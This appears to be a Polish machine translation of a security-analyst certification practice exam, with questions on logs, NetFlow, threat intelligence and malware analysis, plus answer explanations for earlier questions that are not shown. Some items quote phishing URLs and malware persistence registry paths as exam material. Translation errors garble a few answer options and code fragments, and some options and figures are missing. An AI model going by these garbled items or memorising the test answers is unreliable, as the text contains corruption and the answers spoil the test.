Pytania 133-136 odnoszą się do następującego scenariusza i obrazu. Bill przegląda dzienniki uwierzytelniania dla systemu Linux, który obsługuje, i napotyka następujące wpisy w dzienniku:
Aug 30 09:46:54 ip-172-30-0-62 sshd[3051]: Accepted publickey for
ec2-user from 10.174.238.88 port 57478 ssh2: RSA e5:f5:c1:46:bb:49:a1:
43:da:9d:50:c5:37:bd:79:22
Aug 30 09:46:54 ip-172-30-0-62 ssh[3051]: pam_unix[sshd:session]: session
opened for user ec2-user by (uid=0)
Aug 30 09:48:06 ip-172-30-0-62 sudo: ec2-user : TTY=ps/0 ; PWD=/home/ec2-
user ; USER=root; COMMAND=/bin/bash
133. Jaki jest adres IP systemu, w którym użytkownik był zalogowany, gdy inicjował połączenie?
A. 172.30.0.62
B. 62.03.172
C. 10.174.238.88
D. 9.48.6.0
134. Z jakiej usługi skorzystał użytkownik, aby połączyć się z serwerem?
A. HTTPS
B. PTS
C. SSH
D. Telnet
135. Jakiej techniki uwierzytelniania użył użytkownik, aby połączyć się z serwerem?
A. Hasło
B. PKI
C. Token
D. Biometryczny
136. Jakiego konta użyła osoba, aby połączyć się z serwerem?
A. Korzeń
B. ec2-użytkownik
C. bash
D. pam_unix
137. Lucca chce zidentyfikować systemy, które mogły zostać naruszone i są wykorzystywane do eksfiltracji danych. Którą z poniższych technologii powinien wdrożyć, aby przechwytywać dane, które może analizować za pomocą swojego SIEM, aby znaleźć to zachowanie?
A. Zapora sieciowa
B. Kolektor NetFlow
C. Honeypot
D. Monitor BGP
138. Fred uważa, że śledzone przez niego złośliwe oprogramowanie wykorzystuje sieć fast flux i wiele hostów pobierania. Ile różnych hostów powinien przejrzeć na podstawie pokazanego tutaj NetFlow?
Date flow start Duration Proto Src IP Addr:Port Dst IP Addr:Port Packets Bytes Flows
2019-07-11 14:39:30.606 0.448 TCP 192.168.2.1:1451->10.2.3.1:443
10 1510 1
2019-07-11 14:39:30.826 0.448 TCP 10.2.3.1:443->192.168.2.1:1451
7 360 1
2019-07-11 14:45:32.495 18.492 TCP 10.6.2.4:443->192.168.2.1:1496
5 1107 1
2019-07-11 14:45:32.255 18.888 TCP 192.168.2.1:1496->10.6.2.4:443
11 1840 1
2019-07-11 14:46:54.983 0.000 TCP 192.168.2.1:1496->10.6.2.4:443
1 49 1
2008-12-09 16:45:34.764 0.362 TCP 10.6.2.4:443->192.168.2.1:4292
4 1392 1
2008-12-09 16:45:37.516 0.676 TCP 192.168.2.1:4292->10.6.2.4:443
4 462 1
2008-12-09 16:46:38.028 0.000 TCP 192.168.2.1:4292->10.6.2.4:443
2 89 1
2019-07-11 14:45:23.811 0.454 TCP 192.168.2.1:1515->10.6.2.5:443
4 263 1
2019-07-11 14:45:28.879 1.638 TCP 192.168.2.1:1505->10.6.2.5:443
18 2932 1
2019-07-11 14:45:29.087 2.288 TCP 10.6.2.5:443->192.168.2.1:1505
37 48125 1
2019-07-11 14:45:54.027 0.224 TCP 10.6.2.5:443->192.168.2.1:1515
2 1256 1
2019-07-11 14:45:58.551 4.328 TCP 192.168.2.1:1525->10.6.2.5:443
10 648 1
2019-07-11 14:45:58.759 0.920 TCP 10.6.2.5:443->192.168.2.1:1525
12 15792 1
2019-07-11 14:46:32.227 14.796 TCP 192.168.2.1:1525->10.8.2.5:443
31 1700 1
2019-07-11 14:46:52.983 0.000 TCP 192.168.2.1:1505->10.8.2.5:443
1 40 1
A. 1
B. 3
C. 4
D. 5
139. Fiona rozważa scenariusz, w którym komponenty używane przez jej organizację w swoim oprogramowaniu, pochodzące z publicznych repozytoriów GitHub, są trojanami. Co powinna zrobić najpierw, aby stworzyć podstawę swojego proaktywnego polowania na zagrożenia?
A. Wyszukaj przykłady podobnego scenariusza
B. Zweryfikuj aktualnie używane oprogramowanie z repozytoriów
C. Sformułuj hipotezę
D. Przeanalizuj narzędzia dostępne dla tego typu ataku
140. Jason profiluje aktora-zagrożenia za pomocą STIX 2.0 i może wybrać jedną z poniższych etykiet.
Indywidualny
Klub
Konkurs
Zespół
Organizacja
Rząd
Co on identyfikuje?
A. Przynależność
B. Poziom zasobów ataku
C. Poziom certyfikacji
D. Nazwa zagrożenia
141. Tracy przejrzała pismo CrowdStrike dla grupy APT znanej jako HELIX KITTEN, która zauważa, że grupa jest znana z tworzenia "dokładnie zbadanych i ustrukturyzowanych wiadomości typu spear-phishing odpowiednich dla interesów ukierunkowanego personelu". Jakie rodzaje obrony najprawdopodobniej pomogą, jeśli zidentyfikuje HELIX KITTEN jako aktora zagrażającego jej organizacji?
A. DKIM
B. Kampania uświadamiająca
C. Blokowanie wszystkich wiadomości e-mail od nieznanych nadawców
D. SPF
142. Micah chce wykorzystać dane, które zebrał, aby pomóc w swojej praktyce polowania na zagrożenia. Jakie podejście najlepiej nadaje się do korzystania z dużych ilości logów i danych analitycznych?
A. Badanie oparte na hipotezach
B. Dochodzenie oparte na wskaźnikach kompromisu
C. Dochodzenie na podstawie oznak ataku
D. Dochodzenie oparte na sztucznej inteligencji/ML
143. Dani chce przeanalizować pakiet złośliwego oprogramowania, który dzwoni do domu. Co powinna rozważyć, zanim pozwoli złośliwemu oprogramowaniu "zadzwonić do domu"?
A. Czy złośliwe oprogramowanie może zmienić zachowanie?
B. Czy adres IP lub podsieć hosta może stać się celem dalszych ataków?
C. Szkodliwe oprogramowanie może przeprowadzać ataki na inne hosty
D. Wszystkie powyższe
144. Po przeprowadzeniu skanowania nmapem swojej sieci spoza swojej sieci, James zauważa, że duża liczba urządzeń pokazuje otwarte trzy porty TCP na publicznych adresach IP: 9100, 515 i 631. Jakiego typu urządzenia znalazł, i jak mógł zmniejszyć powierzchnię ataku swojej organizacji?
A. Punkty dostępu bezprzewodowego, wyłącz administrację zdalną
B. Pulpitowe stacje robocze, włącz zaporę hosta
C. Drukarki, przenieś drukarki do wewnętrznego zakresu adresów IP
D. Przełączniki sieciowe, włącz szyfrowany tryb administracyjny
145. W ramach swoich działań polegających na polowaniu na zagrożenia Olivia łączy swoje kluczowe aktywa w grupy. Dlaczego miałaby to zrobić?
A. Aby zwiększyć złożoność analizy
B. Aby wykorzystać podobieństwo profili zagrożeń
C. Aby mieszać poziomy czułości
D. Zapewnienie spójnego punktu odniesienia dla zagrożeń
146. Nietypowy wychodzący ruch sieciowy, nienormalne rozmiary odpowiedzi HTML, anomalie żądań DNS i niedopasowane porty dla ruchu aplikacji to przykłady czego?
A. Polowanie na zagrożenia
B. SCAP
C. Wskaźniki kompromisu
D. Ciągłe źródła zagrożeń
147. Alex pracuje nad zrozumieniem powierzchni ataku swojej organizacji. Usługi, pola wejściowe w aplikacji internetowej i protokoły komunikacyjne to przykłady tego, który element oceny powierzchni ataku?
A. Zagrożenia
B. Wektory ataku
C. Zagrożenia
D. Napięcie powierzchniowe
148. Jiang chce połączyć kanały TAXII z własnymi informacjami dotyczącymi analizy zagrożeń. Jakiego standardu może użyć, aby zapewnić, że jego dane będą działać w wielu systemach bez konieczności ich konwersji?
A. SAML
B. XHTML
C. STIX
D. YELLOW
149. Naomi chce poprawić możliwości wykrywania w swoim środowisku bezpieczeństwa. Głównym problemem dla jej firmy jest wykrywanie zagrożeń wewnętrznych. Jaki rodzaj technologii może wdrożyć, aby pomóc w tego rodzaju proaktywnym wykrywaniu zagrożeń?
A. AIDS
B. UEBA
C. SOAR
D. SIEM
150. Ling chce wykorzystać swoją platformę SOAR do skuteczniejszego radzenia sobie z atakami phishingowymi. Jakie elementy potencjalnych wiadomości phishingowych powinna zebrać w ramach procesu automatyzacji i przepływu pracy, aby segregować i przypisywać wskaźniki ważności?
A. Wiersze tematu
B. Adresy nadawców wiadomości e-mail
C. Załączniki
D. Wszystkie powyższe
151. Isaac chce napisać skrypt do wysyłania zapytań do usługi czarnej listy botów na forum BotScout. Jakich danych powinien użyć do zapytania o usługę na podstawie poniższego obrazu?
A. Adres e-mail
B. Imię
C. Adres IP
D. Data
152. Syslog, interfejsy API, poczta e-mail, STIX/TAXII i połączenia z bazami danych to przykłady zastosowania SOAR?
A. MKOl
B. Metody pozyskiwania danych
C. Połączenia SCAP
D. Wektory ataku
153. Talos zapewnia automatyczne narzędzie do syntezy sygnatur BASS ze względu na współczesne wyzwania związane ze złośliwym oprogramowaniem. Jaki główny problem powoduje rosnące wykorzystanie automatycznych narzędzi do tworzenia sygnatur złośliwego oprogramowania?
A. Bardziej złożone złośliwe oprogramowanie
B. Ogromna liczba nowych sygnatur złośliwego oprogramowania
C. Ręczne tworzenie podpisów opartych na hashu trwa zbyt długo
D. Sandboxing nie jest już skuteczny
154. Yaan korzysta z wielu źródeł danych w swoim środowisku bezpieczeństwa, dodając kontekstowe informacje o użytkownikach z Active Directory, dane geolokalizacyjne, wiele źródeł danych o zagrożeniach, a także informacje z innych źródeł, aby lepiej zrozumieć środowisko bezpieczeństwa. Jaki termin opisuje ten proces?
A. Dryf danych
B. Gromadzenie zagrożeń
C. Centralizacja zagrożeń
D. Wzbogacanie danych
155. Kiedy system DLP monitoruje kopiowanie/wklejanie, dane wyświetlane na ekranie lub przechwytywane z ekranu, drukowanie i podobne czynności, jaki termin opisuje stan danych?
A. Dane w spoczynku
B. Dane w ruchu
C. Dane w użyciu
D. Wykonanie danych
156. Mila przegląda dane pochodzące z narzędzia analizy zagrożeń typu open source MISP i widzi następujący wpis:
"Jednostka 42 odkryła nową rodzinę złośliwego oprogramowania, którą nazwaliśmy "Reaver", powiązaną z osobami atakującymi korzystającymi ze złośliwego oprogramowania SunOrcal. Nowa rodzina wydaje się być na wolności od końca 2016 roku i do tej pory zidentyfikowaliśmy tylko 10 unikalnych próbek, co wskazuje na to, że może być oszczędnie używany.Reaver jest również nieco wyjątkowy, ponieważ jego ostateczny ładunek znajduje się w formie elementu panelu sterowania lub pliku CPL. Do tej pory tylko 0,006% wszystkich złośliwych programów widzianych przez Palo Alto Networks wykorzystuje tę technikę, co wskazuje, że w rzeczywistości jest to dość rzadkie.", "Tag":
[{"color": "#00223b", "exportable": true, "name":
"osint:source-type=\"blog-post\""}], "disable_correlation":
false, "object_relation": null, "type": "comment"}, {"comment":
"", "category": "Mechanizm trwałości", "uuid": "5a0a9d47-
Domena 3.0: Operacje bezpieczeństwa i monitorowanie 195
1c7c-4353-8523-440b950d210f", "znacznik czasu": "1510922426",
"to_ids": false, "value": "%COMMONPROGRAMFILES%\\services\\",
"disable_correlation": false, "object_relation": null, "type":
"regkey"}, {"comment": "", "category": "Mechanizm trwałości",
"uuid": "5a0a9d47-808c-4833-b739-43bf950d210f", "znacznik czasu":
"1510922426", "to_ids": fałsz, "wartość":
"%APPDATA%\\microsoft\\mmc\\", "disable_correlation": fałsz,
"object_relation": null, "type": "regkey"}, {"comment": "",
"category": "Mechanizm trwałości", "uuid": "5a0a9d47-91e0-
4fea-8a8d-48ce950d210f", "timestamp": "1510922426", "to_ids":
fałsz, "wartość":
"HKLM\\Oprogramowanie\\Microsoft\\Windows\\Aktualna wersja\\Explorer\\
Foldery powłoki\\Wspólne uruchamianie"
W jaki sposób malware Reaver utrzymuje trwałość?
A. Post na blogu
B. Wstawia się do rejestru
C. Instaluje się jako klucz runonce
D. Prosi użytkownika o pozwolenie na uruchomienie
157. Organizacja Isaaca wdrożyła narzędzie bezpieczeństwa, które uczy się, jak zwykle zachowują się użytkownicy sieci, a następnie wyszukuje różnice, które pasują do zachowań atakujących. Jaki typ systemu może automatycznie analizować te dane, aby zbudować taką zdolność wykrywania?
A. Analiza oparta na sygnaturach
B. Maszyna Babbage
C. Uczenie maszynowe
D. Analiza sztucznej sieci
158. Jaka jest przewaga systemu SOAR nad tradycyjnym systemem SIEM?
A. Systemy SOAR są mniej skomplikowane w zarządzaniu.
B. Systemy SOAR lepiej obsługują duże ilości logów dzięki uczeniu maszynowemu.
C. Systemy SOAR integrują szerszą gamę systemów wewnętrznych i zewnętrznych.
D. Dzienniki SOAR są przesyłane tylko przez bezpieczne protokoły.
159. Jakiego protokołu używa rząd USA do reprezentowania danych przechowywanych w National Vulnerability Database?
A. STIX
B. CVSS
C. SCAP
D. CPE
160. Brian jest w zespole programistycznym, którego firma zleciła mu utrzymanie aplikacji internetowej swojej organizacji. On i jego współpracownicy sprawdzają kod kilka razy dziennie, a następnie kod jest automatycznie weryfikowany i testowany. Jak nazywa się ta praktyka?
A. Ciągła dostawa
B. Wypełnianie repo
C. Ciągła integracja
D. Kodowanie czasu
161. Fiona kontynuowała swoje wysiłki w zakresie polowania na zagrożenia i sformułowała szereg hipotez. Jaką kluczową kwestię powinna wziąć pod uwagę, kiedy je przegląda?
A. Liczba hipotez
B. Jej własne naturalne uprzedzenia
C. Czy są strategiczne czy operacyjne
D. Jeśli napastnicy o nich wiedzą
162. Mila kategoryzuje aktora za pomocą STIX 2.0 i chce opisać aktora odpowiedzialnego za ataki na poziomie APT. Jaki poziom zaawansowania STIX aktora zagrożeń najlepiej pasuje do tego typu aktora?
A. Średniozaawansowany
B. Zaawansowane
C. Ekspert
D. Strategiczne
163. Christina chce opisać motywacje, zdolności, możliwości i reakcje aktora zagrażającego. Jakiego otwartego standardowego języka znaczników może do tego użyć?
A. TAXII
B. Autoryzacja OAuth
C. STIX
D. STONES
164. Alaina dodaje listę adresów URL openphish do swojego narzędzia SOAR i widzi następujące wpisy: http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/
bofa/95843de35406f3cab0b2dcf2b/success.htm
http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/
bofa/9b094075409d3a723c7ee3d9e/sitekey.php
http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/
bofa/9b094075409d3a723c7ee3d9e/success.htm
http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/9b094075409d3a7
23c7ee3d9e/
http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/95843de35406f3c
ab0b2dcf2b/
http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/
bofa/95843de35406f3cab0b2dcf2b/sitekey.php
Jakie działanie powinna podjąć na podstawie takich adresów URL służących do wyłudzania informacji?
A. Zablokuj adres IP na jej granicy firewall
B. Monitoruj adres IP za pomocą jej IDS
C. Usuń e-maile z adresem URL z poczty przychodzącej
D. Nic, ponieważ nie zostały one potwierdzone
165. Rowan chce blokować drive-by-download oraz botować kanały dowodzenia i kontroli, jednocześnie przekierowując potencjalnie dotknięte systemy do komunikatu ostrzegawczego. Co powinna wdrożyć, aby to zrobić?
A. Dziura w DNS
B. WAF
C. IDS
D. UEBA
166. Jaki rodzaj techniki złośliwego oprogramowania ukrywa swoje serwery dowodzenia i kontroli przed dużą liczbą potencjalnych podejrzanych?
A. Polimorficzne złośliwe oprogramowanie domeny
B. Algorytmy generowania domen
C. Mnożniki nazwy hosta
D. Spoofery ICA
167. Alex skonfigurował regułę Snort, która brzmi:
alert tcp any any -> any 22 (mst: "Wykryto!”; sid 10000004;")
Co zazwyczaj wykryje reguła Alexa?
A. Ruch FTP
B. Ruch Telnet
C. Ruch SMTP
D. Ruch SSH
168. Michelle chce wdrożyć narzędzie do testowania bezpieczeństwa analizy statycznej (SAST) w swoim potoku ciągłej integracji. Jakie wyzwanie może napotkać, jeśli jej organizacja używa wielu języków programowania do komponentów stosu aplikacji, które będą testowane?
A. Będą musieli upewnić się, że skaner działa we wszystkich wybranych językach.
B. Będą musieli skompilować cały kod do tego samego języka wyjścia binarnego.
C. Będą musieli uruchamiać aplikacje w piaskownicy.
D. Będą musieli uruchamiać aplikacje w tym samym środowisku wykonawczym.
169. Nina konfiguruje swój system IPS tak, aby wykrywał i powstrzymywał ataki na podstawie sygnatur. Jakie ataki zablokuje?
A. Nowe ataki oparte na zachowaniu
B. Udokumentowane wcześniej ataki, które pasują do sygnatur
C. Udokumentowane wcześniej ataki i podobne ataki oparte na sygnaturach
D. Wszystkie powyższe
170. Nathan chce ustalić, które systemy wysyłają największy ruch w jego sieci. Jakiej metodologii zbierania danych o niskich kosztach ogólnych może użyć do przeglądania źródeł ruchu, miejsc docelowych i ilości?
A. Sniffer sieci do przeglądania całego ruchu
B. Wdrożenie NetFlow
C. Wdrożenie SDWAN
D. Zaimplementuj kran sieciowy
Skorzystaj z poniższej tabeli i informacji o ocenie w przypadku pytań 171-173. Amerykańska Agencja ds. Bezpieczeństwa Cyberbezpieczeństwa i Infrastruktury (CISA) używa skali od 1 do 100 do priorytetyzacji incydentów, z wagą przypisaną do każdej z kilku kategorii. Ocena wpływu funkcjonalnego jest ważona w ich demonstracji w następujący sposób:
Wpływ funkcjonalny Ocena
Brak wpływu 0
Brak wpływu na usługi 20
Minimalny wpływ na usługi niekrytyczne 35
Minimalny wpływ na usługi krytyczne 40
Znaczący wpływ na usługi niekrytyczne 50
Odmowa usług niekrytycznych 60
Znaczący wpływ na usługi krytyczne 70
Odmowa krytycznych usług lub utrata kontroli 100
171. Nathan odkrywa pakiet złośliwego oprogramowania na stacji roboczej użytkownika końcowego. Jaką ocenę powinien przyznać, jeśli rozważa wpływ organizacji na podstawie przedstawionej tabeli?
A. Brak wpływu
B. Brak wpływu na usługi
C. Odmowa usług niekrytycznych
D. Odmowa krytycznych usług lub utrata kontroli
172. Organizacja Nathana korzysta z narzędzia oprogramowania jako usługi (SaaS) do zarządzania listami mailingowymi klientów, których używają do informowania klientów o nadchodzącej sprzedaży z tygodniowym wyprzedzeniem. Podstawowa linia oprogramowania biznesowego organizacji nadal działa, a towary mogą być sprzedawane. Z powodu przerwy w świadczeniu usług nie mogą dodawać nowych klientów do listy przez cały dzień roboczy. Jak Nathan powinien ocenić ten lokalny problem podczas awarii?
A. Minimalny wpływ na usługi niekrytyczne
B. Minimalny wpływ na usługi krytyczne
C. Znaczący wpływ na usługi niekrytyczne
D. Odmowa usług niekrytycznych
173. Podczas dochodzenia w sprawie zhakowanego systemu Nathan odkrywa oznaki zaawansowanego trwałego zagrożenia (APT) rezydującego w systemach administracyjnych jego organizacji. Jak powinien sklasyfikować to zagrożenie?
A. Znaczący wpływ na usługi niekrytyczne
B. Odmowa usług niekrytycznych
C. Znaczący wpływ na usługi krytyczne
D. Odmowa krytycznych usług lub utrata kontroli
174. Adam przegląda przechwycony pakiet Wireshark w celu przeprowadzenia analizy protokołu i odnotowuje następujące dane w statystykach hierarchii protokołu Wireshark. Jaki procent ruchu to najprawdopodobniej zaszyfrowany ruch sieciowy?
A. 85,9 procent
B. 1,7 procent
C. 20,3 procent
D. 1,9 procent
175. Annie przegląda przechwycony pakiet, który jej zdaniem obejmuje pobieranie złośliwego oprogramowania. Jaki host powinna dokładniej zbadać jako źródło złośliwego oprogramowania w oparciu o aktywność pokazaną na poniższym obrazie z jej działań związanych z analizą pakietów?
172.17.8.8
49.51.172.56
C. 172.17.8.172
D. 56.172.51.49
176. Przeglądając dzienniki IPS, Annie znajduje następujący wpis:
ET TROJAN ABUSE.CH Czarna lista SSL Wykryto złośliwy certyfikat SSL (Dridex) Jakie powinno być jej następne działanie?
A. Uruchom skanowanie antymalware systemu powiązanego z wykryciem
B. Blokuj ruch przychodzący z systemu zewnętrznego związanego z infekcją
C. Blokuj ruch wychodzący do systemu zewnętrznego związanego z infekcją
D. Nic, ponieważ jest to fałszywy alarm z powodu wygasłego certyfikatu
177. Steve przesyła próbkę złośliwego oprogramowania do narzędzia analitycznego i otrzymuje następujące komunikaty:
>Plik wykonywalny został usunięty: C:\Logs\mffcae1.exe
>Utworzono proces podrzędny, nadrzędny C:\Windows\system32\cmd.exe
>mffcae1.exe łączy się z nietypowym portem
>Pobrany plik: cx99.exe
Jeśli chciałby sam obserwować zachowanie pobierania, jakie jest najlepsze narzędzie do przechwytywania szczegółowych informacji o tym, co się dzieje?
A. Narzędzie antymalware
B. Wireshark
C. IPS
D. Przepływy sieciowe
178. Abdul analizuje logi proxy z serwerów działających w jego organizacji i zauważa, że dwa serwery proxy mają wpisy dotyczące podobnych działań, które zawsze występują w odstępie jednej godziny od siebie. Oba serwery proxy znajdują się w tym samym centrum danych, a aktywność jest częścią normalnego wieczornego procesu, który odbywa się o godzinie 19:00. Jeden serwer proxy rejestruje dane o godzinie 19:00, jeden wpis o godzinie 18:00. Jaki problem prawdopodobnie napotkał Abdul?
A. Infekcja złośliwym oprogramowaniem naśladująca legalny proces
B. Nieprawidłowe ustawienie strefy czasowej
C. Błąd w skrypcie automatyzacji
D. Błąd wpisu w dzienniku
179. Eric wykonuje analizę zagrożeń i chce scharakteryzować osobę, która zidentyfikowała zagrożenie, którą zidentyfikowała jego organizacja. Aktor groźby jest podobny do grupy znanej jako Anonymous i w przeszłości atakował organizacje z powodów politycznych. Jak powinien scharakteryzować tego aktora groźby?
A. Nieświadomi wtajemniczeni
B. Nieznany
C. APT
D. Haktywista
180. Melissa posługuje się skalą US-CERT, aby zmierzyć wpływ lokalizacji obserwowanej aktywności przez podmiot zagrażający. Która z poniższych lokalizacji powinna być najwyżej ocenianą lokalizacją aktywności zagrożenia?
A. System krytyczny DMZ
B. Sieć biznesowa
C. Biznesowa strefa DMZ
D. Systemy bezpieczeństwa
181. Gavin chce wdrożyć rozwiązanie NAC. Która z poniższych technik jest techniką walidacji, z której może korzystać system NAC oparty na agentach?
A. Aktualny stan poprawki systemu operacyjnego
B. Przypisanie sieci VLAN lub strefy bezpieczeństwa
C. Stan aktualizacji oprogramowania antymalware lub antywirusowego
D. Wszystkie powyższe
182. Jakie informacje są używane do określenia, któ
ze systemy mogą łączyć się z portem sieciowym chronionym przez zabezpieczenia portu?
A. Adres IP
B. Nazwa hosta
C. Adres MAC
D. Identyfikator użytkownika i hasło
183. Czego systemy DLP używają do klasyfikowania danych i zapewniania ich ochrony?
A. Podpisy danych
B. Zasady biznesowe
C. Filtry wychodzące z danych
D. Dane w spoczynku
184. Jana chce skonfigurować swój IPS tak, aby blokował niedawno wykryty stan odmowy usługi, który ma wpływ na jej serwer WWW Apache. Jaka jest najskuteczniejsza metoda szybkiego wdrożenia, jeśli jej IPS jest dostarczany przez komercyjnego dostawcę?
A. Zbadaj atak typu "odmowa usługi" i napisz niestandardową regułę wykrywania
B. Blokuj cały ruch do serwerów internetowych do czasu zainstalowania poprawki
C. Skonfiguruj regułę opartą na sygnaturze przy użyciu sygnatury dostarczonej przez dostawcę
D. Zbadaj atak typu "odmowa usługi", a następnie użyj pierwszego opublikowanego dowodu koncepcji exploita, aby zbudować sygnaturę w celu wykrycia ataku
185. Zhi chce przechwytywać przepływy sieciowe ze swojej sieci, jak pokazano na poniższym obrazku. Gdzie powinna zbierać przepływy sieciowe, aby zrównoważyć maksymalną widoczność bez zbierania zbędnych informacji?
186. Benicio chce wdrożyć narzędzie dla wszystkich stacji roboczych i laptopów w swojej firmie, które będzie mogło łączyć behawioralne wykrywanie wskaźników ataku w oparciu o aktualne informacje o zagrożeniach z wglądem w systemy w czasie rzeczywistym. Jakie narzędzie powinien wybrać?
A. IPS
B. EDR
C. CRM
D. UEBA
187. Benita musi zmienić uprawnienia do pliku o nazwie public_secrets.txt przechowywanego na serwerze Linux i chce, aby plik był czytelny dla wszystkich użytkowników w systemie. Plik jest obecnie ustawiony na:
rwx------
Jakiego polecenia może użyć, aby to zrobić bez możliwości wykonania lub zapisu do pliku?
A. chmod 777 public_secrets.txt
B. chmod 744 public_secrets.txt
C. chmod public_secrets.txt 777
D. chmod 447 public_secrets.txt
188. Eric chce przeanalizować plik binarny złośliwego oprogramowania w możliwie najbezpieczniejszy sposób. Która z poniższych metod ma najmniejsze prawdopodobieństwo, że złośliwe oprogramowanie spowoduje problemy?
A. Uruchom złośliwe oprogramowanie na izolowanej maszynie wirtualnej
B. Przeprowadź dynamiczną analizę złośliwego oprogramowania w piaskownicy
C. Przeprowadź analizę statyczną złośliwego oprogramowania
D. Uruchom złośliwe oprogramowanie w usłudze kontenera
189. Tom chce poprawić swoje możliwości wykrywania w środowisku oprogramowania jako usługi (SaaS). Jaka technologia najlepiej nadaje się do tego, aby zapewnić mu wgląd w wykorzystanie, przepływy danych i inne szczegóły dotyczące środowisk chmurowych?
A. EDR
B. CASB
C. IDS
D. SIEM
190. Chuck chce zidentyfikować narzędzie do udostępniania serwerów, tworzenia serwerów wirtualnych i przydzielania im pamięci masowej oraz konfigurowania sieci i polityk bezpieczeństwa. Jakie narzędzie powinien rozważyć?
v
A. Skrypty
B. API
C. Orkiestracja przepływu pracy
D. SCAP
191. Jakie korzyści zapewnia TAXII w połączeniu z kanałami danych o zagrożeniach?
A. Interoperacyjność między narzędziami bezpieczeństwa
B. Poufność i integralność danych
C. Większa prędkość udostępniania danych
D. Wszystkie powyższe
192. Środowisko produkcyjne z równoległymi wdrożeniami "niebieskimi" i "zielonymi", z jednym na żywo i jednym zaktualizowanym do najnowszego kodu, jest przykładem jakiego typu potoku?
A. Ciągła integracja
B. Wodospad
C. Spirala
D. Ciągła dostawa
193. Pakiet antymalware Josepha wykrywa nowe złośliwe oprogramowanie, badając kod pod kątem podejrzanych właściwości. Jakiego rodzaju techniki jest to przykład?
A. Inspekcja kodu Fagan
B. Analiza heurystyczna
C. Uczenie maszynowe
D. Sztuczna inteligencja
194. Isaac chce zidentyfikować znane wzorce dobrego zachowania dla wszystkich aplikacji, z których korzysta jego organizacja. Jeśli nie chce, aby członek personelu przeglądał logi i zachowania dla każdej aplikacji w każdym uruchomionym scenariuszu, jaki rodzaj narzędzia analitycznego najlepiej nadawałby się do radzenia sobie z taką ilością i typem danych?
A. Analiza trendów
B. Uczenie maszynowe
C. Analiza ręczna
D. Analiza punktów końcowych
195. Juan chce skontrolować aktywność systemu plików w Windows i konfiguruje kontrolę systemu plików Windows. Jakie ustawienie może ustawić, aby wiedzieć, czy plik został zmieniony, czy nie przy użyciu audytu plików systemu Windows?
A. Ustaw wykrywanie zmian
B. Ustaw walidację wersji pliku
C. Ustaw modyfikacje audytu
D. Żadne z powyższych
196. Naomi chce przeanalizować adresy URL znalezione w jej pasywnych dziennikach monitorowania DNS, aby znaleźć łącza poleceń i kontroli generowane przez DGA (algorytm generowania domeny). Jakie techniki najprawdopodobniej się do tego przydadzą?
A. Wyszukiwania WHOIS i zapytania NXDOMAIN dotyczące podejrzanych adresów URL
B. Wysyłanie zapytań do białych list adresów URL
Domena 3.0: operacje bezpieczeństwa i monitorowanie 205
C. Sondy DNS sieci dowodzenia i kontroli
D. Analiza języka naturalnego nazw domen
197. Organizacja Dereka pracuje nad naprawą po niedawnej infekcji złośliwym oprogramowaniem, która spowodowała awarie w całej organizacji podczas ważnej części cyklu biznesowego. Na co Derek powinien w pierwszej kolejności zwrócić największą uwagę, aby prawidłowo przeprowadzić selekcję?
A. Natychmiastowy wpływ na operacje, aby jego zespół mógł przywrócić funkcjonalność
B. Całkowity wpływ wydarzenia, aby jego zespół mógł dostarczyć dokładny raport końcowy
C. Natychmiastowy wpływ na operacje, aby jego zespół mógł zidentyfikować prawdopodobnego sprawcę zagrożenia
D. Całkowity wpływ zdarzenia, aby jego zespół mógł zbudować nowy model zagrożeń do wykorzystania w przyszłości
198. Kathleen chce mieć pewność, że jej zespół analityków bezpieczeństwa widzi ważne informacje o stanie bezpieczeństwa jej organizacji za każdym razem, gdy logują się do SIEM. Jaka część SIEM została zaprojektowana w celu zapewnienia szybkiego dostępu do informacji o stanie?
A. Silnik raportowania
B. Raporty e-mailowe
C. Deska rozdzielcza
D. Zasady
199. Lucca przegląda logi historii poleceń basha w systemie, który, jak podejrzewa, mógł zostać użyty jako część naruszenia. Odkrywa następujące polecenie grep uruchomione w katalogu /users przez użytkownika administracyjnego. Co znajdzie polecenie? Grep -r "sudo" /home/users/ | grep "bash.log"
A. Wszystkie wystąpienia polecenia sudo w systemie
B. Wszystkie wystąpienia logowania root przez użytkowników
C. Wszystkie wystąpienia polecenia sudo w plikach dziennika bash w katalogach domowych użytkowników
D. Wszystkie linie, które nie zawierają słowa sudo lub bash.log w katalogach użytkowników.
200. Munju chce przetestować pocztę e-mail swojej organizacji pod kątem złośliwych ładunków. Jakie narzędzie powinna wybrać, aby wykonać tę czynność?
A. Narzędzie antymalware
B. Algorytm mieszający
C. IPS
D. UEBA
Odpowiedzi
1. B. Witryny takie jak VirusTotal uruchamiają wiele silników antymalware, które mogą używać różnych nazw pakietów złośliwego oprogramowania. Może to spowodować, że pakiet złośliwego oprogramowania będzie pasował do wielu różnych infekcji.
2. B. Monitor wydajności systemu Windows zapewnia podgląd na żywo wykorzystania pamięci przez uruchomioną aplikację lub usługę. Może to być przydatne do analizy pamięci na żywo. MemCheck i Win-Mem zostały wymyślone na to pytanie, a na górze jest przydatne narzędzie Linux do sprawdzania pamięci
wykorzystanie. Jeśli nie jesteś zaznajomiony z takimi narzędziami, możesz chcieć spędzić trochę czasu z popularnymi arkuszami do ściągania poleceń w systemach Windows i Linux, takimi jak arkusz Linuksa, który można znaleźć na stronie www.linuxtrainingacademy.com/linux-commands-cheat-sheet/ .
3. C. Aplikacja Monitor zasobów systemu Windows jest użytecznym narzędziem zarówno do przeglądania danych w czasie rzeczywistym, jak i ich wykresów w czasie, umożliwiając Abul obserwację skoków i spadków w użyciu, które mogą wskazywać na nieprawidłowe zachowanie.
4. C. Różnice binarne przyglądają się wielu potencjalnie powiązanym plikom binarnym, na których działają narzędzia anty-reverseengineering, i szuka podobieństw. Wykresy mapują te dane, pomagając narzędziu identyfikować rodziny złośliwego oprogramowania pomimo zabezpieczeń, jakie stosują autorzy złośliwego oprogramowania. Jak można się domyślić, pozostałe odpowiedzi na to pytanie zostały zmyślone.
